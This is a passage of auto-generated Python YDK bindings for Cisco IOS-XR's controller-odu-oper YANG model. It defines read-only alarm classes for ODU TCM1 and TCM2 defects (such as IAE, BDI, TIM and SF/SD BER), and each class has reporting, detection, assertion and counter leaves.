    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Tcm1Iae, self).__init__()

        self.yang_name = "tcm1-iae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-iae"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Iae']['meta_info']
class Tcm1Biae(_Entity_):
    """
    TCM1 Backward Incoming Alignment Error.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm1Biae, self).__init__()

        self.yang_name = "tcm1-biae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-biae"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Biae']['meta_info']
class Tcm1Bdi(_Entity_):
    """
    TCM1 Backward Defect Monitoring.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi, self).__init__()

        self.yang_name = "tcm1-bdi"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-bdi"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi']['meta_info']
class Tcm1Tim(_Entity_):
    """
    TCM1 Trail Trace Identifier Mismatch.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm1Tim, self).__init__()

        self.yang_name = "tcm1-tim"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-tim"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Tim']['meta_info']
class Tcm1SfBer(_Entity_):
    """
    TCM1 SF BER alarm.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer, self).__init__()

        self.yang_name = "tcm1-sf-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-sf-ber"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer']['meta_info']
class Tcm1SdBer(_Entity_):
    """
    TCM1 SD BER alarm.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer, self).__init__()

        self.yang_name = "tcm1-sd-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-sd-ber"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer']['meta_info']
class Tcm2Ais(_Entity_):
    """
    TCM2 Alarm Indication Signal.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2Ais, self).__init__()

        self.yang_name = "tcm2-ais"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-ais"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Ais']['meta_info']
class Tcm2Ltc(_Entity_):
    """
    TCM2 Loss of Tandem connection Monitoring.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc, self).__init__()

        self.yang_name = "tcm2-ltc"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-ltc"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc']['meta_info']
class Tcm2Oci(_Entity_):
    """
    TCM2 Open Connection Indication.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2Oci, self).__init__()

        self.yang_name = "tcm2-oci"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-oci"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Oci']['meta_info']
class Tcm2Lck(_Entity_):
    """
    TCM2 Upstream Connection Locked.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2Lck, self).__init__()

        self.yang_name = "tcm2-lck"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-lck"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Lck']['meta_info']
class Tcm2Iae(_Entity_):
    """
    TCM2 Incoming Alignment Error.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2Iae, self).__init__()

        self.yang_name = "tcm2-iae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-iae"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Iae']['meta_info']
class Tcm2Biae(_Entity_):
    """
    TCM2 Backward Incoming Alignment Error.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2Biae, self).__init__()

        self.yang_name = "tcm2-biae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-biae"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Biae']['meta_info']
class Tcm2Bdi(_Entity_):
    """
    TCM2 Backward Defect Monitoring.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi, self).__init__()

        self.yang_name = "tcm2-bdi"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-bdi"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi']['meta_info']
class Tcm2Tim(_Entity_):
    """
    TCM2 Trail Trace Identifier Mismatch.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2Tim, self).__init__()

        self.yang_name = "tcm2-tim"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-tim"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Tim']['meta_info']
class Tcm2SfBer(_Entity_):
    """
    TCM2 SF BER alarm.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer, self).__init__()

        self.yang_name = "tcm2-sf-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-sf-ber"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer']['meta_info']
class Tcm2SdBer(_Entity_):
    """
    TCM2 SD BER alarm.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer, self).__init__()

        self.yang_name = "tcm2-sd-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
